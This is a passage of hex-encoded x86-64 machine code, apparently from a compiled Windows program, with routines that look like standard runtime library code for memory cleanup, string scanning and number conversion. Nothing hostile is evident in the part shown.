e164c8d45e0ba010000008bcfe8f5150000488b55e0eb0e488b82080100000fb7047883e00185c07410488b82100100000fb60438e9c4000000807df800740b488b45f083a0c8000000fd8bc7e9bd000000488b45e083b8d4000000017e2b448bf7488d55e041c1fe08410fb6cee8b816000085c074134488751040887d11c6451200b902000000eb18e8a094ffffb901000000c7002a00000040887d10c6451100488b55e0c7442440010000004c8d4d108b4204488b923801000041b80001000089442438488d4520c7442430030000004889442428894c2420488d4de0e8030e000085c00f844effffff83f8010fb6452074090fb64d21c1e0080bc1807df800740b488b4df083a1c8000000fd4c8d5c2470498b7b184d8b7328498be35dc3cccc833d814a010000750e8d41bf83f819770383c1208bc1c333d2e98efeffffcccc4883ec184533c04c8bc985d275484183e10f488bd10f57c94883e2f0418bc94183c9ff41d3e1660f6f02660f74c1660fd7c04123c175144883c210660f6f02660f74c1660fd7c085c074ec0fbcc04803c2e9a6000000833da3de0000020f8d9e0000004c8bd10fb6c24183e10f4983e2f08bc80f57d2c1e1080bc8660f6ec1418bc94183c9ff41d3e1f20f70c800660f6fc266410f7402660f70d900660fd7c8660f6fc366410f7402660fd7d04123d14123c9752e0fbdca660f6fca660f6fc34903ca85d24c0f45c14983c21066410f740a66410f7402660fd7c9660fd7d085c974d28bc1f7d823c1ffc823d00fbdca4903ca85d24c0f45c1498bc04883c418c3f6c10f7419410fbe013bc24d0f44c14180390074e349ffc141f6c10f75e70fb6c2660f6ec066410f3a630140730d4c63c14d03c166410f3a63014074bb4983c110ebe248895c2408574883ec20488bd9498b49104533d24885db7518e88a92ffffbb160000008918e8b291ffff8bc3e98f0000004885d274e3418bc24585c0448813410f4fc0ffc04898483bd0770ce85792ffffbb22000000ebcb488d7b01c60330488bc7eb1a44381174080fbe1148ffc1eb05ba30000000881048ffc041ffc84585c07fe144881078148039357c0feb03c6003048ffc880383974f5fe00803b31750641ff4104eb17488bcfe8dde0ffff488bd7488bcb4c8d4001e82eb5ffff33c0488b5c24304883c4205fc3cc405356574881ec80000000488b05deda00004833c44889442478488bf1488bda488d4c2448498bd0498bf9e8f8d2ffff488d442448488d5424404889442438836424300083642428008364242000488d4c24684533c94c8bc3e8761f00008bd84885ff7408488b4c244048890f488d4c2468488bd6e8a21900008bc8b80300000084d8750c83f901741a83f9027513eb05f6c3017407b804000000eb07f6c302750233c0807c246000740c488b4c245883a1c8000000fd488b4c24784833cce86c7bffff4881c4800000005f5e5bc3cc48895c2418574881ec80000000488b050cda00004833c44889442478488bf9488bda488d4c2440498bd0e829d2ffff488d442440488d5424604889442438836424300083642428008364242000488d4c24684533c94c8bc3e8a71e0000488d4c2468488bd78bd8e8281300008bc8b80300000084d8750c83f901741a83f9027513eb05f6c3017407b804000000eb07f6c302750233c0807c245800740c488b4c245083a1c8000000fd488b4c24784833cce8aa7affff488b9c24a00000004881c4800000005fc3cc4533c9e960feffff48895c2408440fb75a064c8bd18b4a04450fb7c3b80080000041b9ff0700006641c1e804664423d88b02664523c181e1ffff0f00bb00000080410fb7d085d27418413bd1740bba003c0000664403c2eb2441b8ff7f0000eb1c85c9750d85c0750941214204412102eb58ba013c0000664403c233db448bc8c1e10bc1e00b41c1e915418902440bc9440bcb45894a044585c9782a418b12438d04098bcac1e91f448bc9440bc88d0412418902b8ffff0000664403c04585c979da45894a0466450bd8488b5c24086645895a08c3cccccc4055535657488d6c24c14881ec88000000488b0568d800004833c448894527488bfa48894de7488d55e7488d4df7498bd9498bf0e8f7feffff0fb745ff4533c0f20f1045f7f20f1145e74c8d4d07488d4de7418d5011668945efe8692500000fbe4d09890f0fbf4d074c8d450b894f04488bd3488bce894708e85eddffff85c0751f48897710488bc7488b4d274833cce82b79ffff4881c4880000005f5e5b5dc34883642420004533c94533c033d233c9e80a8effffccccb902000000e9fa97ffffcccc4885c90f8400010000534883ec20488bd9488b4918483b0da8e900007405e8d17effff488b4b20483b0d9ee900007405e8bf7effff488b4b28483b0d94e900007405e8ad7effff488b4b30483b0d8ae900007405e89b7effff488b4b38483b0d80e900007405e8897effff488b4b40483b0d76e900007405e8777effff488b4b48483b0d6ce900007405e8657effff488b4b68483b0d7ae900007405e8537effff488b4b70483b0d70e900007405e8417effff488b4b78483b0d66e900007405e82f7effff488b8b80000000483b0d59e900007405e81a7effff488b8b88000000483b0d4ce900007405e8057effff488b8b90000000483b0d3fe900007405e8f07dffff4883c4205bc3cccc4885c97466534883ec20488bd9488b09483b0d89e800007405e8ca7dffff488b4b08483b0d7fe800007405e8b87dffff488b4b10483b0d75e800007405e8a67dffff488b4b58483b0dabe800007405e8947dffff488b4b60483b0da1e800007405e8827dffff4883c4205bc34885c90f84f0030000534883ec20488bd9488b4908e8627dffff488b4b10e8597dffff488b4b18e8507dffff488b4b20e8477dffff488b4b28e83e7dffff488b4b30e8357dffff488b0be82d7dffff488b4b40e8247dffff488b4b48e81b7dffff488b4b50e8127dffff488b4b58e8097dffff488b4b60e8007dffff488b4b68e8f77cffff488b4b38e8ee7cffff488b4b70e8e57cffff488b4b78e8dc7cffff488b8b80000000e8d07cffff488b8b88000000e8c47cffff488b8b90000000e8b87cffff488b8b98000000e8ac7cffff488b8ba0000000e8a07cffff488b8ba8000000e8947cffff488b8bb0000000e8887cffff488b8bb8000000e87c7cffff488b8bc0000000e8707cffff488b8bc8000000e8647cffff488b8bd0000000e8587cffff488b8bd8000000e84c7cffff488b8be0000000e8407cffff488b8be8000000e8347cffff488b8bf0000000e8287cffff488b8bf8000000e81c7cffff488b8b00010000e8107cffff488b8b08010000e8047cffff488b8b10010000e8f87bffff488b8b18010000e8ec7bffff488b8b20010000e8e07bffff488b8b28010000e8d47bffff488b8b30010000e8c87bffff488b8b38010000e8bc7bffff488b8b40010000e8b07bffff488b8b48010000e8a47bffff488b8b50010000e8987bffff488b8b68010000e88c7bffff488b8b70010000e8807bffff488b8b78010000e8747bffff488b8b80010000e8687bffff488b8b88010000e85c7bffff488b8b90010000e8507bffff488b8b60010000e8447bffff488b8ba0010000e8387bffff488b8ba8010000e82c7bffff488b8bb0010000e8207bffff488b8bb8010000e8147bffff488b8bc0010000e8087bffff488b8bc8010000e8fc7affff488b8b98010000e8f07affff488b8bd0010000e8e47affff488b8bd8010000e8d87affff488b8be0010000e8cc7affff488b8be8010000e8c07affff488b8bf0010000e8b47affff488b8bf8010000e8a87affff488b8b00020000e89c7affff488b8b08020000e8907affff488b8b10020000e8847affff488b8b18020000e8787affff488b8b20020000e86c7affff488b8b28020000e8607affff488b8b30020000e8547affff488b8b38020000e8487affff488b8b40020000e83c7affff488b8b48020000e8307affff488b8b50020000e8247affff488b8b58020000e8187affff488b8b60020000e80c7affff488b8b68020000e8007affff488b8b70020000e8f479ffff488b8b78020000e8e879ffff488b8b80020000e8dc79ffff488b8b88020000e8d079ffff488b8b90020000e8c479ffff488b8b98020000e8b879ffff488b8ba0020000e8ac79ffff488b8ba8020000e8a079ffff488b8bb0020000e89479ffff488b8bb8020000e88879ffff4883c4205bc3cccc405541544155415641574883ec50488d6c244048895d404889754848897d50488b0522d200004833c5488945088b5d6033ff4d8be1458be84889550085db7e2a448bd3498bc141ffca403838740c48ffc04585d275f04183caff8bc3412bc2ffc83bc38d58017c028bd8448b75788bf74585f67507488b01448b7004f79d80000000448bcb4d8bc41bd2418bce897c242883e20848897c2420ffc2ff15ef5100004c63f885c0750733c0e91702000049b9f0ffffffffffff0f85c07e6e33d2488d42e049f7f74883f802725f4b8d0c3f488d4110483bc176524a8d0c7d100000004881f900040000772a488d410f483bc17703498bc14883e0f0e89980ffff482be0488d7c24404885ff749cc707cccc0000eb13e8a778ffff488bf84885c0740ac700dddd00004883c7104885ff0f8474ffffff448bcb4d8bc4ba01000000418bce44897c242848897c2420ff153e51000085c00f84590100004c8b6500217424284821742420498bcc458bcf4c8bc7418bd5e8c00400004863f085c00f843001000041b9000400004585e974368b4d7085c90f841a0100003bf10f8f12010000488b4568894c2428458bcf4c8bc7418bd5498bcc4889442420e879040000e9ef00000085c07e7733d2488d42e048f7f64883f8027268488d0c36488d4110483bc1765b488d0c7510000000493bc97735488d410f483bc1770a48b8f0ffffffffffff0f4883e0f0e88b7fffff482be0488d5c24404885db0f8495000000c703cccc0000eb13e89577ffff488bd84885c0740ec700dddd00004883c310eb0233db4885db746d458bcf4c8bc7418bd5498bcc8974242848895c2420e8d803000033c985c0743c8b457033d248894c2438448bce4c8bc348894c243085c0750b894c242848894c2420eb0d89442428488b45684889442420418bceff15f84f00008bf0488d4bf08139dddd00007505e8cd76ffff488d4ff08139dddd00007505e8bc76ffff8bc6488b4d084833cde8b670ffff488b5d40488b7548488b7d50488d6510415f415e415d415c5dc348895c24084889742410574883ec70488bf2488bd1488d4c2450498bd9418bf8e86fc7ffff8b8424c0000000488d4c24504c8bcb894424408b8424b8000000448bc7894424388b8424b0000000488bd689442430488b8424a800000048894424288b8424a000000089442420e8a3fcffff807c246800740c488b4c246083a1c8000000fd4c8d5c2470498b5b10498b7318498be35fc3cccc405541544155415641574883ec40488d6c243048895d404889754848897d50488b059ece00004833c548894500448b756833ff458bf94d8be0448bea4585f67507488b01448b7004f75d70418bce897c24281bd248897c242083e208ffc2ff15a84e00004863f085c0750733c0e9de0000007e7748b8f0ffffffffffff7f483bf07768488d0c36488d4110483bc1765b488d0c75100000004881f9000400007731488d410f483bc1770a48b8f0ffffffffffff0f4883e0f0e8577dffff482be0488d5c24304885db74a1c703cccc0000eb13e86575ffff488bd84885c0740fc700dddd00004883c310eb03488bdf4885db0f8474ffffff4c8bc633d2488bcb4d03c0e89d7effff458bcf4d8bc4ba01000000418bce8974242848895c2420ff15e84d000085c074154c8b4d60448bc0488bd3418bcdff15814f00008bf8488d4bf08139dddd00007505e8ae74ffff8bc7488b4d004833cde8a86effff488b5d40488b7548488b7d50488d6510415f415e415d415c5dc3cccc48895c24084889742410574883ec608bf2488bd1488d4c2440418bd9498bf8e860c5ffff8b8424a0000000488d4c2440448bcb894424308b8424980000004c8bc789442428488b8424900000008bd64889442420e82ffeffff807c245800740c488b4c245083a1c8000000fd488b5c2470488b7424784883c4605fc3488bc44889580848896810488970184889782041564883ec20488be933ffbee30000004c8d35768500008d043e41b855000000488bcd992bc2d1f84863d8488bd34803d2498b14d6e80301000085c0741379058d73ffeb038d7b013bfe7ecb83c8ffeb0b488bc34803c0418b44c608488b5c2430488b6c2438488b742440488b7c24484883c420415ec3cccc4883ec284885c97422e866ffffff85c078194898483de4000000730f488d0db17600004803c08b04c1eb0233c04883c428c3cccc4c8bdc49895b0849897310574883ec504c8b15994a0100418bd9498bf84c3315eccb00008bf2742a33c0498943e8498943e0498943d88b84248800000089442428488b842480000000498943c841ffd2eb2de875ffffff448bcb4c8bc78bc88b8424880000008bd689442428488b8424800000004889442420ff15c14b0000488b5c2460488b7424684883c4505fc3cc4533c94c8bd24c8bd94d85c074434c2bda430fb70c138d41bf6683f81977046683c120410fb7128d42bf6683f81977046683c2204983c20249ffc8740a6685c97405663bca74ca0fb7c2440fb7c9442bc8418bc1c3cccccc4883ec284885c97515e80682ffffc70016000000e82f81ffff83c8ffeb038b411c4883c428c3cccc4883ec2883f9fe750de8de81ffffc70009000000eb4285c9782e3b0da849010073264863c9488d15642b0100488bc183e11f48c1f805486bc958488b04c20fbe44080883e040eb12e89f81ffffc70009000000e8c880ffff33c04883c428c3cc40534883ec20488bd94885c9750a4883c4205be9bc000000e82f00000085c0740583c8ffeb20f74318004000007415488bcbe841ffffff8bc8e882220000f7d81bc0eb0233c04883c4205bc348895c24084889742410574883ec208b411833f6488bd924033c02753ff741180801000074368b392b791085ff7e2de8f8feffff488b5310448bc78bc8e80a2300003bc7750f8b431884c0790f83e0fd894318eb07834b182083ceff488b4b10836308008bc6488b74243848890b488b5c24304883c4205fc3ccccccb901000000e902000000cccc48895c2408488974241048897c24184155415641574883ec30448bf133f633ff8d4e01e81cd0ffff9033db4183cdff895c24203b1d1b3701007d7e4c63fb488b05073701004a8b14f84885d27464f6421883745e8bcbe855e3ffff90488b05e93601004a8b0cf8f641188374334183fe017512e8b4feffff413bc57423ffc689742424eb1b4585f67516f64118027410e897feffff413bc5410f44fd897c2428488b15a53601004a8b14fa8bcbe882e3ffffffc3e976ffffffb901000000e871d1ffff4183fe010f44fe8bc7488b5c2450488b742458488b7c24604883c430415f415e415dc3cccc48895c24084889742410574883ec3033ff8d4f01e843cfffff908d5f03895c24203b1d453601007d634863f3488b0531360100488b0cf04885c9744cf64118837410e8e92a000083f8ff7406ffc7897c242483fb147c31488b0506360100488b0cf04883c130ff1570490000488b0df1350100488b0cf1e8a06fffff488b05e1350100488324f000ffc3eb91b901000000e8b6d0ffff8bc7488b5c2440488b7424484883c4305fc3488974241055574156488bec4883ec604863f9448bf2488d4de0498bd0e852c0ffff8d47013d000100007711488b45e0488b88080100000fb70479eb798bf7488d55e0c1fe08400fb6cee8d5000000ba0100000085c074124088753840887d39c6453a00448d4a01eb0b40887d38c6453900448bca488b45e0895424304c8d45388b4804488d4520894c2428488d4de04889442420e856faffff85c075143845f8740b488b45f083a0c8000000fd33c0eb180fb745204123c6807df800740b488b4df083a1c8000000fd488bb424880000004883c460415e5f5dc3cc40574883ec20488d3dd3ce000048393dbcce0000742bb90c000000e8b8cdffff90488bd7488d0da5ce0000e8f0d2ffff48890599ce0000b90c000000e887cfffff4883c4205fc3cc40534883ec408bd9488d4c2420e83ebfffff488b4424200fb6d3488b88080100000fb704512500800000807c243800740c488b4c243083a1c8000000fd4883c4405bc3cc40534883ec408bd9488d4c242033d2e8f8beffff488b4424200fb6d3488b88080100000fb704512500800000807c243800740c488b4c243083a1c8000000fd4883c4405bc3cccccc48895c2408488974241848897c2420554154415541564157488bec4883ec60488b0566c600004833c4488945f80fb7410a440fb70933db8bf8250080000041c1e1108945c48b410681e7ff7f00008945e88b410281efff3f000041bc1f000000488955d044894dd88945ec44894df08d7301458d7424e481ff01c0ffff7529448bc38bc3395c85e8750d4803c6493bc67cf2e9b704000048895de8895df0bb02000000e9a6040000488b45e8458bc44183cfff488945e08b0587d80000897dc0ffc8448beb8945c8ffc0994123d403c2448bd04123c441c1fa052bc2442bc04d63da428b4c9de8448945dc440fa3c10f839e000000418bc8418bc74963d2d3e0f7d0854495e87519418d42014863c8eb09395c8de8750a4803ce493bce7cf2eb728b45c8418bcc994123d403c2448bc04123c42bc241c1f8058bd62bc84d63d8428b449de8d3e28d0c103bc872043bca7303448bee418d40ff42894c9de84863d085c078274585ed74228b4495e8448beb448d4001443bc07205443bc67303448bee44894495e8482bd679d9448b45dc4d63da418bc8418bc7d3e04221449de8418d42014863d0493bd67d1d488d4de84d8bc64c2bc2488d0c9133d249c1e002e8a775ffff448b4dd84585ed740203fe8b0d6ad700008bc12b0566d700003bf87d1448895de8895df0448bc3bb02000000e9540300003bf90f8f310200002b4dc0488b45e0458bd7488945e88bc144894df0994d8bde448bcb4123d44c8d45e803c2448be84123c42bc241c1fd058bc88bf8b82000000041d3e22bc1448bf041f7d2418b008bcf8bd0d3e8418bce410bc14123d2448bca4189004d8d400441d3e14c2bde75dc4d63d5418d7b02458d73034d8bca448bc749f7d94d3bc27c15498bd048c1e2024a8d048a8b4c05e8894c15e8eb0542895c85e84c2bc679dc448b45c8458bdc418d4001994123d403c2448bc84123c42bc241c1f905442bd84963c18b4c85e8440fa3d90f8398000000418bcb418bc74963d1d3e0f7d0854495e87519418d41014863c8eb09395c8de8750a4803ce493bce7cf2eb6c418bc0418bcc994123d403c2448bd04123c42bc241c1fa058bd62bc84d63ea428b44ade8d3e28bcb448d0410443bc07205443bc273028bce418d42ff468944ade84863d085c0782485c974208b4495e88bcb448d4001443bc07205443bc673028bce44894495e8482bd679dc418bcb418bc7d3e04963c921448de8418d41014863d0493bd67d19488d4de84d8bc64c2bc2488d0c9133d249c1e002e8d173ffff8b05a7d5000041bd20000000448bcbffc04c8d45e8994123d403c2448bd04123c42bc241c1fa058bc8448bd841d3e7442be841f7d7418b00418bcb8bd0d3e8418bcd410bc14123d7448bca4189004d8d400441d3e14c2bf675db4d63d24c8bc74d8bca49f7d94d3bc27c15498bd048c1e2024a8d048a8b4c05e8894c15e8eb0542895c85e84c2bc679dc448bc38bdfe91b0100008b0513d50000448b1500d5000041bd20000000994123d403c2448bd84123c42bc241c1fb058bc841d3e741f7d7413bfa7c7a48895de80fba6de81f895df0442be88bf8448bcb4c8d45e8418b008bcf418bd723d0d3e8418bcd410bc1448bca41d3e14189004d8d40044c2bf675dc4d63cb418d7e024d8bc149f7d8493bf97c15488bd748c1e2024a8d04828b4c05e8894c15e8eb04895cbde8482bfe79dd448b057cd400008bde4503c2eb6f448b056ed400000fba75e81f448bd34403c78bf8442be84c8d4de8418b018bcf8bd0d3e8418bcd410bc24123d7448bd24189014d8d490441d3e24c2bf675dc4d63d3418d7e024d8bca49f7d9493bfa7c15488bd748c1e2024a8d048a8b4c05e8894c15e8eb04895cbde8482bfe79dd488b55d0442b25f3d30000418acc41d3e0f75dc41bc02500000080440bc08b05ded30000440b45e883f840750b8b45ec448942048902eb0883f82075034489028bc3488b4df84833cce83462ffff4c8d5c2460498b5b30498b7340498b7b48498be3415f415e415d415c5dc3cccc48895c2408488974241848897c2420554154415541564157488bec4883ec60488b05aec000004833c4488945f80fb7410a440fb70933db8bf8250080000041c1e1108945c48b410681e7ff7f00008945e88b410281efff3f000041bc1f000000488955d044894dd88945ec44894df08d7301458d7424e481ff01c0ffff7529448bc38bc3395c85e8750d4803c6493bc67cf2e9b704000048895de8895df0bb02000000e9a6040000488b45e8458bc44183cfff488945e08b05e7d20000897dc0ffc8448beb8945c8ffc0994123d403c2448bd04123c441c1fa052bc2442bc04d63da428b4c9de8448945dc440fa3c10f839e000000418bc8418bc74963d2d3e0f7d0854495e87519418d42014863c8eb09395c8de8750a4803ce493bce7cf2eb728b45c8418bcc994123d403c2448bc04123c42bc241c1f8058bd62bc84d63d8428b449de8d3e28d0c103bc872043bca7303448bee418d40ff42894c9de84863d085c078274585ed74228b4495e8448beb448d4001443bc07205443bc67303448bee44894495e8482bd679d9448b45dc4d63da418bc8418bc7d3e04221449de8418d42014863d0493bd67d1d488d4de84d8bc64c2bc2488d0c9133d249c1e002e8ef6fffff448b4dd84585ed740203fe8b0dcad100008bc12b05c6d100003bf87d1448895de8895df0448bc3bb02000000e9540300003bf90f8f310200002b4dc0488b45e0458bd7488945e88bc144894df0994d8bde448bcb4123d44c8d45e803c2448be84123c42bc241c1fd058bc88bf8b82000000041d3e22bc1448bf041f7d2418b008bcf8bd0d3e8418bce410bc14123d2448bca4189004d8d400441d3e14c2bde75dc4d63d5418d7b02458d73034d8bca448bc749f7d94d3bc27c15498bd048c1e2024a8d048a8b4c05e8894c15e8eb0542895c85e84c2bc679dc448b45c8458bdc418d4001994123d403c2448bc84123c42bc241c1f905442bd84963c18b4c85e8440fa3d90f8398000000418bcb418bc74963d1d3e0f7d0854495e87519418d41014863c8eb09395c8de8750a4803ce493bce7cf2eb6c418bc0418bcc994123d403c2448bd04123c42bc241c1fa058bd62bc84d63ea428b44ade8d3e28bcb448d0410443bc07205443bc273028bce418d42ff468944ade84863d085c0782485c974208b4495e88bcb448d4001443bc07205443bc673028bce44894495e8482bd679dc418bcb418bc7d3e04963c921448de8418d41014863d0493bd67d19488d4de84d8bc64c2bc2488d0c9133d249c1e002e8196effff8b0507d0000041bd20000000448bcbffc04c8d45e8994123d403c2448bd04123c42bc241c1fa058bc8448bd841d3e7442be841f7d7418b00418bcb8bd0d3e8418bcd410bc14123d7448bca4189004d8d400441d3e14c2bf675db4d63d24c8bc74d8bca49f7d94d3bc27c15498bd048c1e2024a8d048a8b4c05e8894c15e8eb0542895c85e84c2bc679dc448bc38bdfe91b0100008b0573cf0000448b1560cf000041bd20000000994123d403c2448bd84123c42bc241c1fb058bc841d3e741f7d7413bfa7c7a48895de80fba6de81f895df0442be88bf8448bcb4c8d45e8418b008bcf418bd723d0d3e8418bcd410bc1448bca41d3e14189004d8d40044c2bf675dc4d63cb418d7e024d8bc149f7d8493bf97c15488bd748c1e2024a8d04828b4c05e8894c15e8eb04895cbde8482bfe79dd448b05dcce00008bde4503c2eb6f448b05cece00000fba75e81f448bd34403c78bf8442be84c8d4de8418b018bcf8bd0d3e8418bcd410bc24123d7448bd24189014d8d490441d3e24c2bf675dc4d63d3418d7e024d8bca49f7d9493bfa7c15488bd748c1e2024a8d048a8b4c05e8894c15e8eb04895cbde8482bfe79dd488b55d0442b2553ce0000418acc41d3e0f75dc41bc02500000080440bc08b053ece0000440b45e883f840750b8b45ec448942048902eb0883f82075034489028bc3488b4df84833cce87c5cffff4c8d5c2460498b5b30498b7340498b7b48498be3415f415e415d415c5dc3cccc48895c24185556574154415541564157488d6c24f94881eca0000000488b05f9ba00004833c4488945ff4c8b757f33db44894d93448d4b0148894da7488955974c8d55df66895d8f448bdb44894d8b448bfb895d87448be3448beb8bf38bcb4d85f67517e89f71ffffc70016000000e8c870ffff33c0e9bf070000498bf8418038207719490fbe0048ba0026000001000000480fa3c273054d03c1ebe1418a104d03c183f9050f8f0a0200000f84ea010000448bc985c90f848301000041ffc90f843a01000041ffc90f84df00000041ffc90f848900000041ffc90f859a02000041b901000000b030458bf944894d874585db7530eb09418a10412bf14d03c13ad074f3eb1f80fa397f1e4183fb19730e2ad04503d94188124d03d1412bf1418a104d03c13ad07ddd8d42d5a8fd742480fa430f8e3c01000080fa457e0c80ea64413ad10f872b010000b906000000e949ffffff4d2bc1b90b000000e93cffffff41b901000000b030458bf9eb2180fa397f204183fb19730d2ad04503d94188124d03d1eb034103f1418a104d03c13ad07ddb498b06488b88f0000000488b013a107585b904000000e9effeffff8d42cf3c087713b90300000041b9010000004d2bc1e9d5feffff498b06488b88f0000000488b013a107510b90500000041b901000000e9b4feffff80fa300f85f201000041b901000000418bc9e99dfeffff8d42cf41b901000000458bf93c087706418d4902ebaa498b06488b88f0000000488b013a100f8479ffffff8d42d5a8fd0f841effffff80fa3074bde9f0feffff8d42cf3c080f866affffff498b06488b88f0000000488b013a100f8479ffffff80fa2b742980fa2d741380fa30748341b9010000004d2bc1e970010000b902000000c7458f00800000e950ffffffb90200000066895d8fe942ffffff80ea3044894d8780fa090f87d9000000b904000000e90affffff448bc94183e9060f849c00000041ffc9747341ffc9744241ffc90f84b40000004183f9020f859b000000395d77748a498d78ff80fa2b741780fa2d0f85ed000000834d8bffb907000000e9d9feffffb907000000e9cffeffff41b901000000458be1eb06418a104d03c180fa3074f580ea3180fa080f8744ffffffb909000000e985feffff8d42cf3c08770ab909000000e96efeffff80fa300f858f000000b908000000e97ffeffff8d42cf498d78fe3c0876d880fa2b740780fa2d7483ebd6b90700000083f90a7467e959feffff4c8bc7eb6341b90100000040b730458be1eb2480fa397f3d478d6cad000fbec2458d6de8468d2c684181fd501400007f0d418a104d03c1403ad77dd7eb1741bd51140000eb0f80fa390f8fa1feffff418a104d03c1403ad77dece991feffff4c8bc741b901000000488b45974c89004585ff0f84130400004183fb1876198a45f63c057c064102c18845f64d2bd141bb180000004103f14585db75150fb7d30fb7c38bfb8bcbe9ef03000041ffcb4103f14d2bd141381a74f24c8d45bf488d4ddf418bd3e8661a0000395d8b7d0341f7dd4403ee4585e4750444036d67395d877504442b6d6f4181fd501400000f8f820300004181fdb0ebffff0f8c65030000488d3570c900004883ee604585ed0f843f030000790e488d35baca000041f7dd4883ee60395d93750466895dbf4585ed0f841d030000bf0000008041b9ff7f0000418bc54883c65441c1fd034889759f83e0070f84f1020000489841bb0080000041be01000000488d0c40488d148e488955976644391a72258b4208f20f1002488d55cf8945d7f20f1145cf488b45cf48c1e81048895597412bc68945d10fb7420a0fb74dc948895daf440fb7e0664123c1895db7664433e1664123c9664523e3448d040166413bc90f836702000066413bc10f835d02000041bafdbf000066453bc20f874d02000041babf3f000066453bc2770c48895dc3895dbfe9490200006685c97520664503c6f745c7ffffff7f7513395dc3750e395dbf750966895dc9e9240200006685c07516664503c6f74208ffffff7f7509395a047504391a74b4448bfb4c8d4daf41ba05000000448955874585d27e6c438d043f488d7dbf488d72084863c8418bc74123c64803f98bd00fb7070fb70e448bdb0fafc8418b01448d3408443bf07205443bf1730641bb0100000045893141be010000004585db74056645017104448b5d874883c7024883ee02452bde44895d874585db7fb2488b5597452bd64983c1024503fe4585d20f8f78ffffff448b55b7448b4dafb802c00000664403c0bf0000008041bfffff0000664585c07e3f4485d77534448b5db3418bd14503d2c1ea1f4503c9418bcbc1e91f438d041b664503c70bc2440bd144894daf8945b3448955b7664585c07fc7664585c07f6a664503c77964410fb7c08bfb66f7d80fb7d0664403c2448475af74034103fe448b5db3418bc241d1e9418bcbc1e01f41d1ebc1e11f440bd841d1ea440bc944895db344894daf492bd675cb85ff448955b7bf000000807412410fb7c166410bc6668945af448b4dafeb040fb745af488b759f41bb0080000066413bc377104181e1ffff01004181f90080010075488b45b183c9ff3bc175388b45b5895db13bc175220fb745b9895db566413bc7750b6644895db9664503c6eb10664103c6668945b9eb064103c68945b5448b55b7eb064103c68945b141b9ff7f000066453bc1731d0fb745b166450bc4448955c5668945bf8b45b366448945c98945c1eb146641f7dc48895dbf1bc023c7050080ff7f8945c74585ed0f85eefcffff8b45c70fb755bf8b4dc18b7dc5c1e810eb358bd30fb7c38bfb8bcbbb01000000eb258bcb0fb7d3b8ff7f0000bb02000000bf00000080eb0f0fb7d30fb7c38bfb8bcbbb040000004c8b45a7660b458f664189400a8bc3664189104189480241897806488b4dff4833cce81654ffff488b9c24f00000004881c4a0000000415f415e415d415c5f5e5dc3cccccc48895c24105556574154415541564157488d6c24d94881ecc0000000488b0595b200004833c448894517440fb75108498bd9448b098955b3ba0080000041bb01000000448945c7448b4104410fb7ca6623ca448d6aff418d431f4533e4664523d548895dbfc745f7ccccccccc745fbccccccccc745ffccccfb3f66894d998d780d6685c9740640887b02eb03884302664585d2752e4585c00f85f40000004585c90f85eb000000663bca0f44c76644892388430266c74303013044886305e95b09000066453bd50f85c5000000be000000806644891b443bc675054585c97429410fbae01e7222488d4b044c8d05d68f0000ba16000000e818b7ffff85c00f8482000000e97b0900006685c9742b4181f8000000c075224585c9754d488d4b044c8d05a98f0000418d5116e8e4b6ffff85c0742be960090000443bc6752b4585c97526488d4b044c8d058a8f0000418d5116e8bdb6ffff85c00f854f090000b805000000884303eb21488d4b044c8d056c8f0000ba16000000e896b6ffff85c00f853d090000c6430306458bdce98c080000410fb7d244894de966448955f1418bc88bc24c8d0dedc30000c1e918c1e80841bf000000808d044841be050000004983e960448945ed66448965e7befdbf00006bc84d69c2104d0000050cedbcec448975b7418d7fff03c8c1f910440fbfd1894d9f41f7da0f846f0300004585d279114c8d0defc4000041f7da4983e9604585d20f8453030000448b45eb8b55e7418bc24983c15441c1fa03448955af4c894da783e0070f84190300004898488d0c40498d348941b900800000488975cf6644390e72258b4608f20f1006488d750789450ff20f114507488b450748c1e810488975cf412bc38945090fb74e0a0fb745f14489659b0fb7d9664123cd48c745d7000000006633d8664123c5448965df664123d9448d0c0866895d9766413bc50f837d02000066413bcd0f837302000041bdfdbf000066453bcd0f875d020000bbbf3f000066443bcb771348c745eb0000000041bdff7f0000e9590200006685c07522664503cb857def75194585c0751485d2751066448965f141bdff7f0000e93b0200006685c97514664503cb857e08750b44396604750544392674ad418bfe488d55d74533f6448bef85ff7e5f438d04244c8d75e7418bdc4863c84123db4c8d7e084c03f133f6410fb707410fb70e448bd60fafc88b02448d0408443bc07205443bc17303458bd34489024585d274056644015a04452beb4983c6024983ef024585ed7fc2488b75cf4533f6412bfb4883c2024503e385ff7f8c448b55df448b45d7b802c00000664403c84533e4bbffff000041bf00000080664585c97e3c4585d775318b7ddb418bd04503d2c1ea1f4503c08bcfc1e91f8d043f664403cb0bc2440bd1448945d78945db448955df664585c97fca664585c97f6d664403cb7967410fb7c166f7d80fb7d0664403ca6644894da3448b4d9b44845dd774034503cb8b7ddb418bc241d1e88bcfc1e01fd1efc1e11f0bf841d1ea440bc1897ddb448945d7492bd375d04585c9440fb74da3448955df7412410fb7c066410bc3668945d7448b45d7eb040fb745d7b900800000663bc177104181e0ffff01004181f80080010075488b45d983caff3bc275388b45dd448965d93bc275210fb745e1448965dd663bc3750a66894de1664503cbeb10664103c3668945e1eb064103c38945dd448b55dfeb064103c38945d941bdff7f000041be05000000bfffffff7f66453bcd720d0fb74597448b55af66f7d8eb320fb745d966440b4d97448955ed448b55af668945e78b45db8945e9448b45eb8b55e76644894df1eb2341bdff7f000066f7db1bc0448965eb4123c7050080ff7f8945ef418bd4458bc48955e74c8b4da74585d20f85c2fcffff488b5dbf8b4d9fbefdbf0000eb07448b45eb8b55e78b45ef41b9ff3f0000c1e81066413bc10f82b6020000664103cb41b9008000004489659b458d51ff894d9f0fb74d01440fb7e9664123ca48c745d700000000664433e8664123c2448965df664523e9448d0c0866413bc20f835802000066413bca0f834e02000066443bce0f874402000041babf3f000066453bca7709448965efe9400200006685c0751c664503cb857def75134585c0750e85d2750a66448965f1e9250200006685c97515664503cb857dff750c443965fb7506443965f774bc418bfc488d55d7418bf64585f67e5d8d043f4c8d7de7448be74863c84523e34c8d75ff4c03f933db410fb707410fb70e448bc30fafc88b02448d1408443bd07205443bd17303458bc34489124585c074056644015a04412bf34983c7024983ee0285f67fc3448b75b74533e4452bf34883c2024103fb448975b74585f67f88488b5dbf448b45df448b55d7b802c00000be0000008041beffff0000664403c8664585c97e3c4485c675318b7ddb418bd24503c0c1ea1f4503d28bcfc1e91f8d043f664503ce0bc2440bc1448955d78945db448945df664585c97fca664585c97f65664503ce795f8b5d9b410fb7c166f7d80fb7d0664403ca44845dd774034103db8b7ddb418bc041d1ea8bcfc1e01fd1efc1e11f0bf841d1e8440bd1897ddb448955d7492bd375d085db488b5dbf448945df7412410fb7c2664